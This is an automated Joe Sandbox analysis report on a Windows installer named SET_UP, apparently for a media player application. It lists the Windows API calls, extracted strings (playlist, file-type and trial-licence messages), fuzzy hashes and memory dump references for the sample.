• lstrcmpA.KERNEL32(?,004DC63C,?,?,00000000,004C56AD,?,?,00000002,00000000,00000000), ref: 004C5726
Strings
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_SET_UP.jbxd
Similarity
• API ID: lstrcmp
• String ID: Automation$Embedding$Unregister$Unregserver$dde
• API String ID: 1534048567-1842294661
• Opcode ID: c16441f9d53fd7198a1bb9fc24d218fcf7f653807f1c21d4b3b65ffa029c4e5d
• Instruction ID: 78ddf47b6bcaf2e209bf009eebd46559588f67293dc92caa4ed3689fdd949687
• Opcode Fuzzy Hash: c16441f9d53fd7198a1bb9fc24d218fcf7f653807f1c21d4b3b65ffa029c4e5d
• Instruction Fuzzy Hash: 1011A3BD201B02E6D6606B72CC99F2F76EC9B50785F14693FA40292241DBBCF4C6867C
APIs
• GetEnvironmentStringsW.KERNEL32(?,00000000,?,?,?,00496853), ref: 0049C4D6
• GetEnvironmentStrings.KERNEL32(?,00000000,?,?,?,00496853), ref: 0049C4EA
• GetEnvironmentStringsW.KERNEL32(?,00000000,?,?,?,00496853), ref: 0049C50B
• FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0049C542
• GetEnvironmentStrings.KERNEL32(?,00000000,?,?,?,00496853), ref: 0049C562
• MultiByteToWideChar.KERNEL32(00000001,00000000,000000FF,00000000,00000000,?,00000000,?,?,?,00496853), ref: 0049C580
• FreeEnvironmentStringsA.KERNEL32(00000000,?,00000000,?,?,?,00496853), ref: 0049C5B5
• MultiByteToWideChar.KERNEL32(00000001,00000000,000000FF,00000000,ShI,?,00000000,?,?,?,00496853), ref: 0049C5E5
• FreeEnvironmentStringsA.KERNEL32(00000000,?,00000000,?,?,?,00496853), ref: 0049C61B
Strings
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_SET_UP.jbxd
Similarity
• API ID: EnvironmentStrings$Free$ByteCharMultiWide
• String ID: ShI
• API String ID: 158306478-866079072
• Opcode ID: 92519848f3a1e1d36107dcb254d786cb262749d1adc4da3d3358e5df32cb98dd
• Instruction ID: 79cc1b1de7b24a31e6c027c2888f335c50317d72b65bed5a9d8d5bf819e594bb
• Opcode Fuzzy Hash: 92519848f3a1e1d36107dcb254d786cb262749d1adc4da3d3358e5df32cb98dd
• Instruction Fuzzy Hash: 4641F472504221BBEF316B299CC4B2B7E98EB45774F16053FF801D7290DB68AD458399
APIs
Strings
• Free %d-day trial, %d %s left., xrefs: 0042D0A8
• Your free %d-day trial has expired!, xrefs: 0042CFF5
• days, xrefs: 0042D09C, 0042D0A1
• Your free trial has expired!, xrefs: 0042CFE0
• Your license has expired![Expiration date: %d-%d-%d], xrefs: 0042D02D
• This product is licensed to:%s, xrefs: 0042D05D
• This product is licensed to:%s[Expiration date: %d-%d-%d], xrefs: 0042D04A
• day, xrefs: 0042D095
• This license doesn't work with the current version., xrefs: 0042D00B
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_SET_UP.jbxd
Similarity
• API ID: H_prolog
• String ID: Free %d-day trial, %d %s left.$This license doesn't work with the current version.$This product is licensed to:%s$This product is licensed to:%s[Expiration date: %d-%d-%d]$Your free %d-day trial has expired!$Your free trial has expired!$Your license has expired![Expiration date: %d-%d-%d]$day$days
• API String ID: 3519838083-1666988310
• Opcode ID: 202f082522b631c2557fe5a75559d31a7afc5dc2ff13c355e1c68d22b4d7f19c
• Instruction ID: 7e959b3ab071a181ece7b5d48c1308ba3350725bf71dc51048bcf30bd0f74d1f
• Opcode Fuzzy Hash: 202f082522b631c2557fe5a75559d31a7afc5dc2ff13c355e1c68d22b4d7f19c
• Instruction Fuzzy Hash: B2415C31E0022EDACF15DF94E909ABE77A1EF14308F94405BB901622A0D77C9955DBAB
APIs
• GetClientRect.USER32(?,?), ref: 00401F84
• CopyRect.USER32(?,?), ref: 00401FF0
• CopyRect.USER32(?,?), ref: 00401FFA
• GetSystemMetrics.USER32(00000002), ref: 00402087
• GetSystemMetrics.USER32(00000002), ref: 00402098
• GetSystemMetrics.USER32(00000002), ref: 004020A5
• GetSystemMetrics.USER32(00000002), ref: 004020BC
  • Part of subcall function 004B5717: MoveWindow.USER32(?,?,00000001,?,?,?,?,00401FBE,?,?,?,?,00000001), ref: 004B5733
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_SET_UP.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: MetricsSystem$Rect$Copy$ClientMoveWindow
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 91314685-0
                                                                                                                                                                                                  • Opcode ID: 3ca9e7c86176172c290d5b894ab3984458f0cd5b74757a07d185ad32690b19a4
                                                                                                                                                                                                  • Instruction ID: 5ab8efa24b8bbd11978d2cede2bb51316ca7d57d0df16cbbe857fd5e581d3db1
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 3ca9e7c86176172c290d5b894ab3984458f0cd5b74757a07d185ad32690b19a4
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 91913C31A006199FCB18DFA9CA89AAEF7F6AF48304F14412EE611F7790D7B4A941CF14
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • __EH_prolog.LIBCMT ref: 00410377
                                                                                                                                                                                                    • Part of subcall function 0041054B: SendMessageW.USER32(?,00000403,00000000,00000000), ref: 00410557
                                                                                                                                                                                                  • ImageList_GetImageInfo.COMCTL32(?,00000000,?), ref: 0041039D
                                                                                                                                                                                                  • SendMessageW.USER32(?,00000146,00000000,00000000), ref: 004103EF
                                                                                                                                                                                                  • GetTextExtentPoint32W.GDI32(?,?,?,?), ref: 0041043A
                                                                                                                                                                                                  • GetTextExtentPoint32W.GDI32(?,?,?,?), ref: 0041046D
                                                                                                                                                                                                  • SendMessageW.USER32(?,00000152,00000000,?), ref: 004104A3
                                                                                                                                                                                                  • GetSystemMetrics.USER32(00000002), ref: 004104AD
                                                                                                                                                                                                  • SendMessageW.USER32(?,00000154,00000000,00000000), ref: 004104BE
                                                                                                                                                                                                  • GetSystemMetrics.USER32(00000000), ref: 004104D6
                                                                                                                                                                                                  • GetWindowRect.USER32(?,?), ref: 004104E1
                                                                                                                                                                                                  • SendMessageW.USER32(?,00000160,?,00000000), ref: 00410509
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000000.00000002.2021357980.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021343825.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021411965.00000000004CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021433746.00000000004EE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021451764.0000000000504000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.0000000000507000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.000000000050B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.000000000050D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021511426.000000000050E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_SET_UP.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: MessageSend$ExtentImageMetricsPoint32SystemText$H_prologInfoList_RectWindow
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 1228825044-0
                                                                                                                                                                                                  • Opcode ID: 24ddb03be673e0771f5019eed80e010c1f89ce6fc44cbf502a7fd3fe41896106
                                                                                                                                                                                                  • Instruction ID: c4085f2012dd36736d2a7a309dc7a43fee2ee331bbbc47648a453fc30da225e2
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 24ddb03be673e0771f5019eed80e010c1f89ce6fc44cbf502a7fd3fe41896106
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 0F51F671A00219AFDB14DFA5CD81EEEBBB5FF08304F10452EE505A72A1DBB46E44CB64
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • GetWindowLongA.USER32(?,000000FC), ref: 004AC0DD
                                                                                                                                                                                                  • RemovePropA.USER32(?,?), ref: 004AC113
                                                                                                                                                                                                  • SetWindowLongA.USER32(?,000000FC,00000000), ref: 004AC119
                                                                                                                                                                                                  • RemovePropA.USER32(?,?), ref: 004AC147
                                                                                                                                                                                                  • SetWindowLongA.USER32(?,000000FC,00000000), ref: 004AC14D
                                                                                                                                                                                                  • GetWindow.USER32(?,00000005), ref: 004AC1A2
                                                                                                                                                                                                  • GetWindow.USER32(00000000,00000002), ref: 004AC1B3
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000000.00000002.2021357980.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021343825.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021411965.00000000004CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021433746.00000000004EE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021451764.0000000000504000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.0000000000507000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.000000000050B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.000000000050D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021511426.000000000050E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_SET_UP.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: Window$Long$PropRemove
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 3256693057-0
                                                                                                                                                                                                  • Opcode ID: e3822a0b86b5d7b9453c2b462f446bdf154f08cd03f778a2783d0da869f83ded
                                                                                                                                                                                                  • Instruction ID: 30631ea632bd8e89a25fdc6b1aa450c3c71374aca7deac532b5f27531986247d
                                                                                                                                                                                                  • Opcode Fuzzy Hash: e3822a0b86b5d7b9453c2b462f446bdf154f08cd03f778a2783d0da869f83ded
                                                                                                                                                                                                  • Instruction Fuzzy Hash: B1212C7B2155156AD7816774AC80E7F269CDBBB324B110236F504D3251FB698D034BBD
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000000.00000002.2021357980.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021343825.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021411965.00000000004CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021433746.00000000004EE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021451764.0000000000504000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.0000000000507000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.000000000050B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.000000000050D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021511426.000000000050E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_SET_UP.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: H_prolog
                                                                                                                                                                                                  • String ID: / $%02d:%02d.%d$%02d:%02d:%02d.%d$%d.%d$-00:00$-00:00 / 00:00$00:00$00:00 / 00:00
                                                                                                                                                                                                  • API String ID: 3519838083-2180132554
                                                                                                                                                                                                  • Opcode ID: ad224f9775064904f9bfc297eb062ddd9671fa1b947929d9045237d68e5d187d
                                                                                                                                                                                                  • Instruction ID: 46bb0925597853e3fc2f3a32a23d133604a0a38cb17d27f118d865c8fb8364a3
                                                                                                                                                                                                  • Opcode Fuzzy Hash: ad224f9775064904f9bfc297eb062ddd9671fa1b947929d9045237d68e5d187d
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 97919EB1E01208EBCF14DBD9C985AEEBBB6AF58314F24402FF101A3251D7799A05CB69
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • __EH_prolog.LIBCMT ref: 004C6AF2
                                                                                                                                                                                                    • Part of subcall function 004B7F7C: GetModuleFileNameW.KERNEL32(?,?,00000104), ref: 004B7F96
                                                                                                                                                                                                    • Part of subcall function 004B7F7C: GetShortPathNameW.KERNEL32(?,00000000,00000104), ref: 004B7FAE
                                                                                                                                                                                                  • RegQueryValueW.ADVAPI32(80000000,?,00000000,00000208), ref: 004C6CB0
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000000.00000002.2021357980.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021343825.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021411965.00000000004CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021433746.00000000004EE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021451764.0000000000504000.00000004.00000001.01000000.00000003.sdmpDownload File
• Associated: 00000000.00000002.2021468738.0000000000507000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2021468738.000000000050B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2021468738.000000000050D000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2021511426.000000000050E000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_SET_UP.jbxd
Similarity
• API ID: Name$FileH_prologModulePathQueryShortValue
• String ID: %s\DefaultIcon$%s\ShellNew$%s\shell\open\%s$%s\shell\print\%s$%s\shell\printto\%s$command$ddeexec
• API String ID: 365916388-556638191
• Opcode ID: c84257b50b0205e73b9d7b30bd0797bd147951fee474c5551f3f502af1b151ec
• Instruction ID: 01b2e047186ede162486b104ca1b1d96aad3f0bd2543f889fa1aab9aa5747ac3
• Opcode Fuzzy Hash: c84257b50b0205e73b9d7b30bd0797bd147951fee474c5551f3f502af1b151ec
• Instruction Fuzzy Hash: E8716B71D0021AABCF00EBE5CD45FEEB7B9AF18344F10442EF515B6291EB796A04CB69
APIs
• __EH_prolog.LIBCMT ref: 0041CA2B
• ExtractIconW.SHELL32(?,?,000000FF), ref: 0041CA75
• DestroyIcon.USER32(00000000,?,?,.playlist,?,Playlist,00000001,00000020), ref: 0041CAA2
Strings
Memory Dump Source
• Source File: 00000000.00000002.2021357980.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2021343825.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2021411965.00000000004CE000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2021433746.00000000004EE000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2021451764.0000000000504000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2021468738.0000000000507000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2021468738.000000000050B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2021468738.000000000050D000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2021511426.000000000050E000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_SET_UP.jbxd
Similarity
• API ID: Icon$DestroyExtractH_prolog
• String ID: "%s" "%%1"$%s\DefaultIcon$%s\shell\open\%s$,%d$.playlist$command
• API String ID: 786898281-3904124294
• Opcode ID: 5a14a821efc9ef537dfc6cb07cecf17dec13fc726093915d43d3368e3ee2d957
• Instruction ID: 4a196c615d8842c79cf5b057c93d1fd03fc8115f5814331a37412c92f4425407
• Opcode Fuzzy Hash: 5a14a821efc9ef537dfc6cb07cecf17dec13fc726093915d43d3368e3ee2d957
• Instruction Fuzzy Hash: 4851F771A40249AFCF11EBB5CD95EEEBBB8AF14304F10442EF441A3291D77CAA48C769
APIs
• __EH_prolog.LIBCMT ref: 004091A8
• GetClientRect.USER32(?,?), ref: 004091FA
• ClientToScreen.USER32(?,000000FF), ref: 00409257
• PtInRect.USER32(?,000000FF,000000FF), ref: 00409267
• GetSubMenu.USER32(00000000,00000001), ref: 004092AE
• GetSubMenu.USER32(00000000,00000002), ref: 004092EC
• GetParent.USER32(?), ref: 00409302
• SetMenuDefaultItem.USER32(?,00008045,00000000), ref: 0040931E
Strings
Memory Dump Source
• Source File: 00000000.00000002.2021357980.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2021343825.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2021411965.00000000004CE000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2021433746.00000000004EE000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2021451764.0000000000504000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2021468738.0000000000507000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2021468738.000000000050B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2021468738.000000000050D000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2021511426.000000000050E000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_SET_UP.jbxd
Similarity
• API ID: Menu$ClientRect$DefaultH_prologItemParentScreen
• String ID: QL
• API String ID: 1359895289-956036402
• Opcode ID: 6667d42960165d10dea3f266c7dcd95b5ca8517207ad7bc9a6daf8e248842250
• Instruction ID: 05286673b968c2188966ab13c5c3dadb2b69d29b6caa15989f4e679dcedb5759
• Opcode Fuzzy Hash: 6667d42960165d10dea3f266c7dcd95b5ca8517207ad7bc9a6daf8e248842250
• Instruction Fuzzy Hash: 1851AF71A00209ABDF109FA5CC4ABEEBBB5FF44324F04462EF512A62D1D7789D00CB54
APIs
  • Part of subcall function 004BBB20: GetFocus.USER32 ref: 004BBB23
  • Part of subcall function 004BBB20: GetParent.USER32(00000000), ref: 004BBB4A
  • Part of subcall function 004BBB20: GetWindowLongW.USER32(?,000000F0), ref: 004BBB65
  • Part of subcall function 004BBB20: GetParent.USER32(?), ref: 004BBB73
  • Part of subcall function 004BBB20: GetDesktopWindow.USER32 ref: 004BBB77
  • Part of subcall function 004BBB20: SendMessageW.USER32(00000000,0000014F,00000000,00000000), ref: 004BBB8B
• GetMenu.USER32(?), ref: 004C1B09
• GetMenu.USER32(?), ref: 004C1B1D
• GetMenuItemCount.USER32(00000000), ref: 004C1B26
• GetSubMenu.USER32(00000000,00000000), ref: 004C1B37
• GetMenuItemCount.USER32(?), ref: 004C1B59
• GetMenuItemID.USER32(?,00000000), ref: 004C1B7A
• GetSubMenu.USER32(?,00000000), ref: 004C1B92
• GetMenuItemID.USER32(?,00000000), ref: 004C1BAA
• GetMenuItemCount.USER32(?), ref: 004C1BE1
• GetMenuItemID.USER32(?,00000000), ref: 004C1BFF
Memory Dump Source
• Source File: 00000000.00000002.2021357980.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2021343825.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2021411965.00000000004CE000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2021433746.00000000004EE000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2021451764.0000000000504000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2021468738.0000000000507000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2021468738.000000000050B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2021468738.000000000050D000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2021511426.000000000050E000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_SET_UP.jbxd
Similarity
• API ID: Menu$Item$Count$ParentWindow$DesktopFocusLongMessageSend
• String ID:
• API String ID: 4186786570-0
• Opcode ID: 40a768e15c718dbd1365c2e8e35789065db74f1d80b9deed94d57bc1d95b3a45
• Instruction ID: 2a75f65d847baf40f71d5d717dfa5d12071644a2e3772674a2d70654b5b16428
• Opcode Fuzzy Hash: 40a768e15c718dbd1365c2e8e35789065db74f1d80b9deed94d57bc1d95b3a45
• Instruction Fuzzy Hash: 875171389002059FDF51EFA5CD80FAEB7B4AF05354F20446EE511A6262E739ED51DF28
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • GetDesktopWindow.USER32 ref: 004C0AB3
                                                                                                                                                                                                  • GetWindow.USER32(00000000), ref: 004C0AC0
                                                                                                                                                                                                  • IsWindowEnabled.USER32(00000000), ref: 004C0ACD
                                                                                                                                                                                                  • SendMessageW.USER32(00000000,0000036C,00000000,00000000), ref: 004C0AFC
                                                                                                                                                                                                  • GetWindow.USER32(00000000,00000002), ref: 004C0B0A
                                                                                                                                                                                                  • GetDesktopWindow.USER32 ref: 004C0B32
                                                                                                                                                                                                  • GetWindow.USER32(00000000), ref: 004C0B39
                                                                                                                                                                                                  • IsWindowEnabled.USER32(00000000), ref: 004C0B42
                                                                                                                                                                                                  • SendMessageW.USER32(00000000,0000036C,00000000,00000000), ref: 004C0B71
                                                                                                                                                                                                  • EnableWindow.USER32(00000000,00000000), ref: 004C0B7D
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000000.00000002.2021357980.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021343825.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021411965.00000000004CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021433746.00000000004EE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021451764.0000000000504000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.0000000000507000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.000000000050B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.000000000050D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021511426.000000000050E000.00000002.00000001.01000000.00000003.sdmpDownload File
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_SET_UP.jbxd
Similarity
• API ID: Window$DesktopEnabledMessageSend$Enable
• String ID:
• API String ID: 2339141687-0
APIs
• DefWindowProcW.USER32(?,00000046,00000000,?), ref: 004BCE6A
• GetWindowRect.USER32(?,?), ref: 004BCE81
• SetRect.USER32(?,?,00000000,?,?), ref: 004BCEBB
• InvalidateRect.USER32(?,?,00000001), ref: 004BCECA
• SetRect.USER32(?,?,00000000,?,?), ref: 004BCEE1
• InvalidateRect.USER32(?,?,00000001), ref: 004BCEF0
• SetRect.USER32(?,00000000,?,?,?), ref: 004BCF1B
• InvalidateRect.USER32(?,?,00000001), ref: 004BCF26
• SetRect.USER32(?,00000000,?,?,?), ref: 004BCF3D
• InvalidateRect.USER32(?,?,00000001), ref: 004BCF48
Memory Dump Source
• Source File: 00000000.00000002.2021357980.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Similarity
• API ID: Rect$Invalidate$Window$Proc
• String ID:
• API String ID: 570070710-0
APIs
• __EH_prolog.LIBCMT ref: 0040D338
• RegEnumKeyExW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,?,?,Data\File Types,00509168,00000000), ref: 0040D3A5
• RegCloseKey.ADVAPI32(?,?,Data\File Types,00509168,00000000), ref: 0040D484
Strings
Similarity
• API ID: CloseEnumH_prolog
• String ID: %s\%s$Data\File Types$Extension$Icon$Name
• API String ID: 1777603892-1963114798
APIs
• GetModuleFileNameA.KERNEL32(00000000,?,00000104,00000010), ref: 0049CD4A
• GetStdHandle.KERNEL32(000000F4,004DE5BC,00000000,00000000,00000000,00000010), ref: 0049CE20
• WriteFile.KERNEL32(00000000), ref: 0049CE27
Strings
Similarity
• API ID: File$HandleModuleNameWrite
• String ID: ...$<program name unknown>$Microsoft Visual C++ Runtime Library$Runtime Error!Program: $hWP
• API String ID: 3784150691-155117939
APIs
• __EH_prolog.LIBCMT ref: 00430EE9
• PathFileExistsW.SHLWAPI(?), ref: 00430EF5
• WritePrivateProfileStringW.KERNEL32(Playlist,00000000,00000000,?), ref: 00430F5C
• WritePrivateProfileStringW.KERNEL32(Playlist,NumberOfEntries,?,?), ref: 00430F95
• WritePrivateProfileStringW.KERNEL32(Playlist,?,?,?), ref: 00430FD4
  • Part of subcall function 004B8008: __EH_prolog.LIBCMT ref: 004B800D
Strings
Similarity
• API ID: PrivateProfileStringWrite$H_prolog$ExistsFilePath
• String ID: File%d$NumberOfEntries$Playlist
• API String ID: 888805520-2421212926
APIs
• GetStockObject.GDI32(00000011), ref: 004B89A6
• GetStockObject.GDI32(0000000D), ref: 004B89AE
• GetObjectW.GDI32(00000000,0000005C,?), ref: 004B89BB
• GetDC.USER32(00000000), ref: 004B89CA
• GetDeviceCaps.GDI32(00000000,0000005A), ref: 004B89E1
• MulDiv.KERNEL32(?,00000048,00000000), ref: 004B89ED
• ReleaseDC.USER32(00000000,00000000), ref: 004B89F8
Strings
Memory Dump Source
• Source File: 00000000.00000002.2021357980.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021343825.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021411965.00000000004CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021433746.00000000004EE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021451764.0000000000504000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.0000000000507000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.000000000050B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.000000000050D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021511426.000000000050E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_SET_UP.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: Object$Stock$CapsDeviceRelease
                                                                                                                                                                                                  • String ID: System
                                                                                                                                                                                                  • API String ID: 46613423-3470857405
                                                                                                                                                                                                  • Opcode ID: 0f15ae94ddfa5905752a833a0eae201733889c3abecf8ff8b82fb3aad6dd80ac
                                                                                                                                                                                                  • Instruction ID: 949fb456aa4517d35feaa22f89457abdfb768c660aab8826c9d52e595a7c4e27
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 0f15ae94ddfa5905752a833a0eae201733889c3abecf8ff8b82fb3aad6dd80ac
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 5B117771600318ABEB505B928C49FAE7B69BB04744F00402AFA05AB2D0DB789D41C769
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • CopyRect.USER32(?,?), ref: 00409F10
                                                                                                                                                                                                  • InflateRect.USER32(?,000000FC,00000000), ref: 00409F1A
                                                                                                                                                                                                  • CopyRect.USER32(?,?), ref: 00409F43
